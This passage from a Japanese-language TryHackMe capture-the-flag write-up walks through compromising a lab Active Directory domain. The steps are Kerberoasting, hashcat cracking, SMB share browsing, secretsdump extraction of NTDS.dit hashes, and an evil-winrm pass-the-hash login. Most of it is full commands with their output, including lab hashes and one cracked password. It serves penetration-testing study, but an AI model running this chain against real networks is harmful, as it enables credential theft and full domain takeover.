5df160976e02452fc6a45ea17024e9aea81626368bc52daf8e777558c3260c231eb50f64e4a45484f5eb8c94b36f100aa34754a610a7abcaa3065ad9c901637ffc9b7eecb61f88ab779f354e90b2cafe1ee1e0720a891deab47b5fee4c71a9cd4462b390f9c34b220bdb750c28639ff3496e75fe8ef76c08f54c1887e48d4212ba2d7ec9ec5c5cd564393a18499de59c41f18b3be693ab9394975ce41c727c1272b5949084e691c439816817ef97f142cc8cb3c992bb0790bcd529a39cd4f3c22f4a31ea13747e2fe1af4cd0b0bdc3564819c29167c5a666bc620150a857206a7918fd48ca9b9846578a96c0e94cc112c95f22b6b8cdb8852312c283d2d40b745f4fb8f80019c3b4c91e46db729a89e5663d69ca1e7a26b828430409943a9c471dee328f607b29a8e87705da20abeb9e62c6895a156bd99e188068d43a13f9b9a58e0c8545edf68f75863d1a74dab30025662447cd9c979990ef6a
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/monitoring_svc*$cf630ab775e7ce8d80a0808fa6ab0c9c$21ad87bb22915e9128f3f96e56107689db65d434768fd553c0851771df7688aec93e4537f3ac2cd9f3ed447845cb0047b713cad004f077b849b7eb4974c3a83f5083bf4a60ab2f09218bcade2f5da8ef7da06c25c96725375731178fb4f34091ac7126a03e38e7e71a919167a26020e46cf9d81c9558702a66f962d5f8e7eda4a8efbec25a9f474930ba646300ae977c97dd26cc8e55e4751ef6b015007e4c544e2723598b19961bf67e367bd88b610d7959d4f4572dbbfadf301aa668f7bc45d259d0722193ad7dd1ae9b096d0839f961059b9b5c31785dcd73f07b7654cfcf9555a530924883c7ba452c7b488943356b778eb48719d61e67dc64a1e0accf7910dbd709d73cc03ef3dd49007ab57dfa29f807b964454b47f0442b9e2c0faa3127dfa5a2ec0c1f9efe395d8e6e367cfaef273a6f55b268ee196f697b9c3e6ee61f1e91772c8fa9f5cbb23f6e738fca651cb87ce7ef40c290499b6f28e94fd760fd1314fac817dc3789a5d16867324ceaea6351611b81aff36dfbd9192eda026d1a37292ad00823d8264b83d589af9d271d7a9ae46b51071d5d6f8de56c6ef591452d7503a3c097cc81deb119933608fed13122e5977d25b6eeb95feaf5fcbbac57881c2d482ca8993d4ad0db5d72c2f8c77ead7894f8ba609bc5feaf46ab7685aa5fcb6efc4d837108330a7c41c23923726d3efa3e32ffb14ef3883478ad5a2f8eaac1dca21f2d31882e5ecaff12dff4b08b384f8b6d84d9838c4ce64c8b1ea004b1d3f71c1c3c4688425392ebe1f406e59e5d1b4c60a4365f10dfaa4319816d5f5262c7ba65f6a307410d443ed01e582eabc4fe85b792c9302bfc3c432ddf278e40b961dd332f8a0e8263f682aa480952111244090f201377ebea401f58c16294ff54cebd88f9eaf4d6098f6ba678e35897e6941065f59cd9e92b7258b66ac75d3a6099bc18c85d8780ab7146862d7a77bc89934d89c0e016d762f076fe8958d8954afbca54021ba8185700a428e7e7223cf4ce18bb53f72c38e870fff851f41aefad7e4007b8c3bd505743df80864f3d25b9d44a67dcc2d08e3c3852d9b8fe3062c4a47d08d655a07e9d01a9a0b7107a7ddb3943c6f40eaaf42bb5866f1c6a2d468d2fc4f50e2dce07b8d9bebccb35c530b81ac32144523b5c694d1077aca28d53f4e991368c1f10b42b8a7fa415dc06ae35bae7dc0b340ecbfcd91975c65ad93640f13a93b7369e2837fc6927b0503381ab354d52a2ba6b0672a788fc2eeb8748f5336f5d458286d2de8d06b4589994ea0c4cae831add2888e01b64b3a311bb8de870407a7f05231a586879210d51f8c7273892b5d2fa671e04c5ddc9e50ba5603cf390d5e5bf8cfecc281227050b2fca6b2f272aa43c20241ca559ad4094a4f3af9dd0e1816e64a53bd102bb6bc1e2d449ac67d5c7f608de82eb9f766771ae43237c4f9cd49f9620393e0a616626adf28df46e169eff08cd32a6089d315212
すると、なんとfile_svc、firewall、backup_svc、web_svc、monitoring_svcの各TGSチケットを発行してしまいました。このことから、直接、サービスチケットを利用してさらなる侵攻ができそうです。
以下のコマンドから、このTGSチケットをクラックします。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetUserSPNs SOUPEDECODE.LOCAL/[USERNAME]:[LEAKED_PASSWORD] -dc-ip [target_ip] -request > all_hashes.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ grep '\$krb5tgs\$' all_hashes.txt > clean_hashes.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ hashcat -m 13100 clean_hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v7.1.2) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 5 digests; 5 unique digests, 5 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (7812 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$599145c362d702134cd913523ca1fae0$c4e11f7aeebe85a92e6a24e3f8331d435af8709c6e9e4f37e877fbb014aff7ea985b9f05fff330b3b33d23396b4f4cef62b254af08bbc59bb9552b846584f9ca0993415d7c965e2d01eb20aac8353fe7289159a578b5423f16e6a75190ca47613981b3d6e979590aa854a48e1788e7655229f53269d24bfa37f044efd721ab63be00c836b1cdbfc28e9fdd76237de0a7c70581f3334bf120f8b75f1af18711bb263b55b9be7f717c33603289c9fa1ef15ebed09235e8d6414e3c6bd07a5722397b05177d2083556f00a975f0c20ce4c73b9cc5b6ba87b73730cf0bbf8d987f225ca0110cfaa9dbdb2ed5370f405093c5e4d6313629d14591b4fe2bb7d5627fda01207ddafd80547b47757dee1922a710403840954566a1c15ff24c42a55591f4588e0799206a3fe76a0fcbf9b772361f239212726178c5b2bc701253a1262b68854c199fd2deac5389301ee9e07f841de2d31a3b9082331f0d380207db4a9aa75df3315d348a092551e731ebe8d873d337b7506dcc28cf3d30d0baad34e2b8145c4df3260e2dfc8428b4ce2c7562b1e3886effcfe565550168e56ae2ba48a0fe56651ee2a4a46a1d7efe1b71ea07906fad7bc45473aa43efb3888574d75aff0a8ecbbf430c3d554a8f2e045b53f21fe3b14a29288f9880d3f473b33baec4c646def5a7cce5379f454befd727d66a6c17476f8576b48d878a003b464ae807d127411449e5579e7e471431e35685b1101c310f4392f9f89ae33bf0bdbd8d7991d0cc242482c63f790ccaba5bd071c4caf0a84ca1dd89a80104327919f65451f11d92b18cddfc6a7a68dcbf251d52e5e1bd0d45ab868048765ff4e42a445039c1bd21c8c5872a9a4ea4087af9bef5587a425832b425df050317ede713812a7a9929ace2630cbb36787b3d118ca9a6d54ca844ad285024334c607139775ee8f535719da8e1981aea886ed10122cd045c939ef968a613d5186f01722f3766add2f54364620855a5e09edb581d942c82e1648aaf04bc7d5bbd7ecd2a3395573fb44937250cd6aee14ef70cee01574f19437838d527dec2f06b73097b7fd6c7cf49f6a439f2207c98d7919c8701e1cee83aa6d2afddaf3e7bea4a8269301c92bb0013c803ae51225b6724ea159e0bf0500587a64174d9730ec80afa21618591d81c1bd194add5d4728da5fdaa5275615097427e3bf303fe58b7d9320d536ca581252e919132b32f9472cddd6f35821c45bf2f61a02c91faead7dc514c757c4fdc24128e107aad264dd96c0d3a711cd3452f12c00ef0e3f3940b7ecb8d42ccc32656fc3b10619080f5d092b7add7fe7c8263bd645f91b9a27beb9153a20c5fd029317bafdc5ab54f57630a93962876c37426736fffd5e50aaef308924ab6f9a44419f749beec34c8efcb7ffe1ffa3a14f5e49590dc9b2dde3aa4bbd572c8b9b57a18cc3b0329af0e2018902e99a53685628b52abac9585572627199f1af639fb0902655ae7:[CRACKED_PASSWORD]
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: clean_hashes.txt
Time.Started.....: Sun May 10 01:48:00 2026, (9 secs)
Time.Estimated...: Sun May 10 01:48:09 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 7682.7 kH/s (1.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/5 (20.00%) Digests (total), 1/5 (20.00%) Digests (new), 1/5 (20.00%) Salts
Progress.........: 71721925/71721925 (100.00%)
Rejected.........: 0/71721925 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:4 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: !carolyn -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 92c Util: 85%
Started: Sun May 10 01:47:59 2026
Stopped: Sun May 10 01:48:09 2026
途中で止まってしまいましたが、file_svcのTGSチケットを解読することには成功しました。
特定したfile_svcのパスワードを用いて、rootフラグがありそうな共有フォルダの/User/adminフォルダを確認してみましょう。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //10.48.188.21/Users -U 'file_svc%[CRACKED_PASSWORD]' -c 'ls admin'
NT_STATUS_ACCESS_DENIED listing \admin
ただ、残念ながら、/adminの中は見れなそうです。
backupを見てみましょう
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //10.48.188.21/backup -U 'file_svc%Password123!!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jun 18 02:41:17 2024
.. DR 0 Sat Jul 26 02:51:20 2025
backup_extract.txt A 892 Mon Jun 17 17:41:05 2024
12942591 blocks of size 4096. 10704179 blocks available
smb: \> mget backup_extract.txt
Get file backup_extract.txt? y
getting file \backup_extract.txt of size 892 as backup_extract.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \>
すると、backup_extract.txtというテキストファイルが入っていました。
また、その中身を見るとなんと各アカウントのNTLMハッシュが入っていることがわかります。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:[FileServerのNTLMハッシュ]:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
ここで、FileServerのLMハッシュを用いて、SAM、LSAシークレット、NTDS.ditなどからハッシュやチケットを発行するかを検証してみましょう
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-secretsdump 'SOUPEDECODE.LOCAL/FileServer$@[target_ip]' -hashes [FileServerのLMハッシュ]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SOUPEDECODE\DC01$:aes256-cts-hmac-sha1-96:46291478e66446d0dc1823ea2782aba94eb4b6dd86a39a48b8e72e20e2f0df35
SOUPEDECODE\DC01$:aes128-cts-hmac-sha1-96:36303f4d179f3d45d3ec6cfc80e52708
SOUPEDECODE\DC01$:des-cbc-md5:c4706dec6e083bd5
SOUPEDECODE\DC01$:plain_password_hex:0009b92fca1fc62f0062b97ca0eb3f6a6db00c77b4ba637233570d4661e4bd1e3bd0eb908af0bf4432cf90b80731a1e597c28f3cf4576db28d636bdfe94e05a1734b4405c9505478a5a5b0c0d3604b62e116ad7ccd40a689df90f38d6d95b7f2d7745eee08d4654336e52014f1721b5a7696f7631ee74ceff7cc200240cb3504045ad8211e78ab30b2d3f5ea515ac902d1cd103dd684cb8c045732fa9c42f012394a043f1dac35ac76eeeb1605d366dbfd5d66a1c9812f02f721850495b5d8fcca18f5fc8f479a0745aaf3a672a3d5bb392c0714146db02f69a8f0f3813ce07ccf32874b6d98e170598fcfe13070276f
SOUPEDECODE\DC01$:aad3b435b51404eeaad3b435b51404ee:72db3acc7d4f0770a1b371242a29c3ff:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[AdministratorのNTLMハッシュ]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::
soupedecode.local\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::
....
....
すると、Active Directory内にあるすべてのアカウントのNTLMハッシュを吐きました。
見つけたAdministratorのLMハッシュを用いて、evil-winrmでログインを試みます。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ evil-winrm -i [target_ip] -u Administrator -H [AdministratorのLMハッシュ]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
ログインすることに成功しました。
C:\Users\Administrator\Desktopの中に、rootフラグが入っています。
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/17/2024 10:41 AM backup
-a---- 7/25/2025 10:51 AM 33 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
YYYYYYYYYYYYYYYYY
What is the root flag?
Answer: YYYYYYYYYYYYYYYYY
終わりに
今回は、Active Directory環境における基本的な攻撃について触れました。
初心者の方が解くとかなり勉強しやすいのかなと思いました。また、Geminiを併用すると、さらにADのペンテストを学びやすいのではないかと思いました。
これぐらいの方が簡単なので、良い息抜きになりました。今回は特にTipsは無さそうなので、ここまでにします。
ご参考になると幸いです。